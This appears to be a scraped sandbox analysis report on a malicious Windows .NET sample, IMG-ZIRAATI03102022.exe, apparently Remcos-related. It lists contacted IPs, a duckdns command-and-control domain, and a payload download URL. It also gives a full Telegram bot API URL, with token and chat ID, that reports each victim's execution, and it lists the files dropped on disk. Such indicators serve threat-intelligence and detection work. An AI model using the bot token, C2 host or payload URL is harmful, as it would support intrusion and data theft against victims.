Engine | Download Report | Detection | Info |
---|---|---|---|
|
malicious
|
||
|
malicious
Score: 100
|
System: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
|
IP | Country | Detection |
---|---|---|
79.134.225.75 | Switzerland | |
149.154.167.220 | United Kingdom | |
144.76.120.25 | Germany | |
Click to see the 1 hidden entries | ||
178.237.33.50 | Netherlands |
Name | IP | Detection |
---|---|---|
remcapi.duckdns.org | 79.134.225.75 | |
geoplugin.net | 178.237.33.50 | |
www.uplooder.net | 144.76.120.25 | |
Click to see the 1 hidden entries | ||
api.telegram.org | 149.154.167.220 |
Name | Detection |
---|---|
remcapi.duckdns.org | |
http://james.newtonking.com/projects/json | |
http://geoplugin.net/json.gp | |
Click to see the 15 hidden entries | |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | |
http://api.telegram.org | |
https://www.nuget.org/packages/Newtonsoft.Json.Bson | |
https://www.newtonsoft.com/json | |
https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku. | |
https://www.uplooder.net | |
https://api.telegram | |
https://api.telegram.org45k$1 | |
https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg | |
https://www.newtonsoft.com/jsonschema | |
https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exe | |
https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=13914 | |
http://geoplugin.net/json.gp/C | |
https://api.telegram.org/bot | |
https://api.telegram.org |
Name | File Type | Hashes | Detection |
---|---|---|---|
C:\ProgramData\work\FILE.EXE |
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | # | |
C:\ProgramData\work\FILE.EXE:Zone.Identifier |
ASCII text, with CRLF line terminators | # | |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMG-ZIRAATI03102022.exe.log |
ASCII text, with CRLF line terminators | # | |
Click to see the 12 hidden entries | |||
C:\Users\user\AppData\Local\Temp\install.vbs |
data | # | |
C:\Users\user\AppData\Roaming\FILE.exe |
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | # | |
C:\Users\user\AppData\Roaming\FILE.exe:Zone.Identifier |
ASCII text, with CRLF line terminators | # | |
C:\ProgramData\remcos\logs.dat |
data | # | |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FILE.exe.log |
ASCII text, with CRLF line terminators | # | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json |
JSON data | # | |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
data | # | |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive |
data | # | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eijp20js.dii.psm1 |
very short file (no magic) | # | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrha0431.05b.ps1 |
very short file (no magic) | # | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrxaxftx.vxf.ps1 |
very short file (no magic) | # | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvimo0ac.yrw.psm1 |
very short file (no magic) | # |